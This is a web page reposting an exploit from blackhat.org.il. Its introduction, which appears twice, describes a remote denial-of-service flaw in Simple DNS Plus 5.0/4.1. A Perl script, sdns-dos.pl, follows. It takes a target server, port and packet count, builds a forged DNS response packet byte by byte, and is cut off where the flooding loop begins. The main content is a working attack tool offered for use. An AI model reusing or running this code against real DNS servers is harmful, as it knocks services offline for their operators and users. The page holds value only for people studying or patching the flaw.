come from http://www.blackhat.org.il/
after reading the story about Dan kaminskys DNS cache posioning attack
and watching his ridiculous youtube cornflakes commercial
i decided to trace the source of this vulnerability.
so in order to understand how kaminsky attack is any diffrent from the traditional dns cache posioning
i started digging into some RFCs/documentations and playing with the protocol
to see if i can find some clues/logical faults.
yet i didnt find anything worthy and i wonder if kaminsky founding is just some algorithm of guessing a little bit faster the 16 bit transaction ID fieldanyway while i was doing some tests on this Simple DNS server
i’ve found that if i repeatingly send DNS server response packets as if i was a root dns server
to the client port of the DNS server it will remotly cause a denial of service.so what we have here is a DNS response packet built from scratch
that basicly flood the the source port of some “Simple DNS server Plus” and deny its service.
p.s: i used mutiple pack functions to make it more convenient
i could have just squeeze it into one pack but what the heck..
after reading the story about Dan kaminskys DNS cache posioning attack
and watching his ridiculous youtube cornflakes commercial
i decided to trace the source of this vulnerability.
so in order to understand how kaminsky attack is any diffrent from the traditional dns cache posioning
i started digging into some RFCs/documentations and playing with the protocol
to see if i can find some clues/logical faults.
yet i didnt find anything worthy and i wonder if kaminsky founding is just some algorithm of guessing a little bit faster the 16 bit transaction ID fieldanyway while i was doing some tests on this Simple DNS server
i’ve found that if i repeatingly send DNS server response packets as if i was a root dns server
to the client port of the DNS server it will remotly cause a denial of service.so what we have here is a DNS response packet built from scratch
that basicly flood the the source port of some “Simple DNS server Plus” and deny its service.
p.s: i used mutiple pack functions to make it more convenient
i could have just squeeze it into one pack but what the heck..
- #!/usr/bin/perl# Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit## usage: sdns-dos.pl <dns server> <dns source port> <num of packets># Exploit written by Exodus.# http://www.blackhat.org.iluse IO::Socket;if(@ARGV < 3){print("sdns-dos.pl <dns server> <dns source port> <num of packets>");}$sock = IO::Socket::INET->new(PeerAddr => "$ARGV[0]:$ARGV[1]", Proto => 'UDP') || die("Cant connect DNS server");$address = $ARGV[0];$trans = pack("H4","1337");$flags = pack("B16","1000010110110000");$question = pack("H4","0001");$answerRR = pack("H4","0001");$authorityRR = pack("H4","0000");$additionlRR = pack("H4","0000");$type = pack("H4","0001"); # A host name$class = pack("H4","0001"); # IN@parts = split(/\./,$address);foreach $part (@parts){$packedlen = pack("H2",sprintf("%02x",length($part)));$address2 .= $packedlen.$part;}$query = $address2. "\000" . $type . $class;$aname = pack("H4","c00c");$atype = pack("H4","0001");$aclass = pack("H4","0001");$ttl = pack("H8","0000008d");$dlen = pack("H4","0004");$addr = inet_aton("127.0.0.1");$answer = $aname . $atype . $aclass . $ttl . $dlen . $addr;$payload = $trans . $flags . $question . $answerRR. $authorityRR . $additionlRR . $query . $answer;print "sending $ARGV[2] packets… ";for($i=0;$i<=$ARGV[2];$i++){